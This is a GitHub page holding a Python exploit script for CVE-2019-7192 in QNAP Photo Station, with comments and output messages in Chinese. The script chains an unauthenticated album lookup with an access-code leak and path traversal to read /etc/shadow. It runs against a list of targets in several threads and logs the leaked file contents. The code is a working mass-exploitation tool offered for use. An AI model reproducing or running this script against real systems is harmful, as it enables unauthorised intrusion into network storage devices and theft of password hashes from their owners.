forked from VulnExpo/ExploitHunter
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathQNAP_CVE-2019-7192_Exploit.py
108 lines (83 loc) · 3.74 KB
/
QNAP_CVE-2019-7192_Exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
# 作者: VulnExpo
# 日期: 2023-12-22
import requests
import argparse
import threading
import re
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
def check_for_vulnerability(url, proxies=None, success_file=None):
try:
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0",
"Accept": "text/html,application/xhtml+xml,appication/xml;q=0.9,*/*;q=0.8",
"Accept-Language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding":"gzip, deflate",
"Connection":"close",
"Upgrade-Insecure-Requests":"1",
"Pragma":"no-cache",
"Cache-Control":"no-cache",
"Content-Type":"application/x-www-form-urlencoded"
}
req = requests.Session()
# search album_id
print("="*65)
post_data = {'a': 'setSlideshow', 'f': 'qsamplealbum'}
album_id_response = req.post(url + "/photo/p/api/album.php", data=post_data, headers=headers, verify=False, timeout=10)
if album_id_response.status_code != 200:
print("album id not found \n\033[91mnot vulnerable\033[0m")
return False
album_id = re.search('(?<=<output>).*?(?=</output>)', album_id_response.text).group()
# search $_SESSION['access_code']
access_code_response = req.get(url + "/photo/slideshow.php?album=" + album_id, headers=headers, verify=False, timeout=10)
if access_code_response.status_code != 200:
print("slideshow not found \n\033[91mnot vulnerable\033[0m")
return False
access_code = re.search("(?<=encodeURIComponent\\(').*?(?=')", access_code_response.text).group()
def get_file_content(file):
post_data = {'album': album_id, 'a': 'caption', 'ac': access_code, 'f': 'UMGObv', 'filename': file}
file_read_response = req.post(url + "/photo/p/api/video.php", data=post_data, headers=headers, verify=False, timeout=10)
print(f"目标URL: {url}, 响应内容: {file_read_response.text}")
with open(success_file, 'a') as s_file:
s_file.write("=" * 65 + "\n")
s_file.write(f"目标URL: {url}\n")
s_file.write(f"响应内容: {file_read_response.text}\n\n")
# get_file_content('./../../../../../etc/hostname')
get_file_content('./../../../../../etc/shadow')
except Exception as e:
print(f"发生异常:{e}")
return False
def scan_targets(targets, proxies=None, success_file=None):
for target in targets:
target = target.strip()
check_for_vulnerability(target, proxies, success_file)
def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4):
threads = []
for i in range(num_threads):
thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file))
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="QNAP Photo Station远程代码执行漏洞CVE-2019-7192")
parser.add_argument("-u", "--url", help="目标URL")
parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt")
parser.add_argument("-t", "--threads", type=int, default=4, help="线程数,默认为4")
parser.add_argument("-p", "--proxy", help="代理服务器地址(例如:http://localhost:8080)")
args = parser.parse_args()
if not args.url and not args.file:
print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
exit(1)
if args.url:
urls = [args.url]
elif args.file:
with open(args.file, 'r') as file:
urls = file.readlines()
success_file = 'success_targets.txt'
proxies = {
"http": args.proxy,
"https": args.proxy
} if args.proxy else None
multi_threaded_scan(urls, proxies, success_file, args.threads)
print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。")